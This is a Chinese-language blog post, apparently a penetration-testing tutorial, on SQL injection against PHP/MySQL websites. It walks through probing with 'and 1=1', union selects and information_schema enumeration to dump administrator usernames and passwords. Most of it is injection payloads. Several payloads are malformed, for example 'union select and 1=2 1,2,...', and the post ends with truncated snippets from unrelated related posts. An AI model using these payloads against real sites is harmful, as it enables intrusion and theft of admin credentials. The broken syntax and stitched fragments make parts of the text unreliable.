滲透 PHP MYSQL資料庫(上)

2021-07-24 13:32:46 字數 1254 閱讀 4700

sql簡單命令:

mysql -u username -ppassword -h ip   //進入mysql資料庫

show database;  //檢視資料庫有哪些檔案

select version();  //檢視資料庫版本

use admin;     //選擇admin資料庫

show tables;  //檢視當前資料庫有哪些表

select * from member;  //檢視member這張表有什麼

注入步驟:

1,and 1=1       and 1=判斷是否存在注入

2,存在注入 order by 查詢表

3,union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- //兩個減號注釋,表示語句結束,可有可無。

//一般預設知道有admin這張表,用語句union select 1,2,3,4,5,6 from admin 但是很多時候需要自己查詢,因此需要爆庫爆表:union select and 1=2 1,2,3,4,5,6,7,8,9--//需要讓它報錯,報出關鍵字如加入and 1=2

mysql注入一般需要收集的資訊:

version()    //版本資訊

database()    //資料庫名

user()      //當前使用者,如果當前使用者為root,則可不用爆表,用其他攻擊

@@version_compile_os  //作業系統

4,union select and 1=2 1,2,group_concat(table_name),4,5,6,7,8,9,10 from information_schema.tables where table_schema=database   //database是要爆的資料庫,且轉換為hex,即十六進製制數.mysql資料庫版本大於5.0,小於5.0版本用其他方法。引數group_concat是爆出資料庫下的所有表名

5,union select and 1=2 1,2,group_concat(column_name),4,5,6,7,8,9,10 from information_schema.columns where column_name=    //等於號後面寫爆出的管理表名,且轉為hex

6,此時知道資料庫的表名,也大概知道基本結構,則用第三步操作,爆出管理員賬號密碼:

union select and 1=2 1,2,3,username,5,6,7,8,password,10 from admuse

滲透 PHP MYSQL資料庫(下)

php mysql的web,在5.0版本後注入有所不一樣,由於5.0以後的版本自帶information schema.tables資料庫,因此相較5.0之前注入簡單。在上篇文章簡要說明了注入技巧,也有提到過不同許可權的注入,本文簡要說明root許可權及其更高許可權下的注入。1,在收集資訊階段,注入...

滲透,資料庫

資料庫學習 學習路徑 資料庫net start mysql 開啟資料庫 net stop mysql 關閉資料庫 netstat ano 檢視埠開放情況 mysql h 127.0.0.1 p 埠號 u root p 新增環境變數的方法 1 找到對應的路徑 例 d phpstudy pro exte...

PHP Mysql資料庫連線

1,date default timezone set prc 獲取北京時區 header content type text html charset utf 8 編碼 define db host localhost 資料庫位址,一般為localhost define db user root ...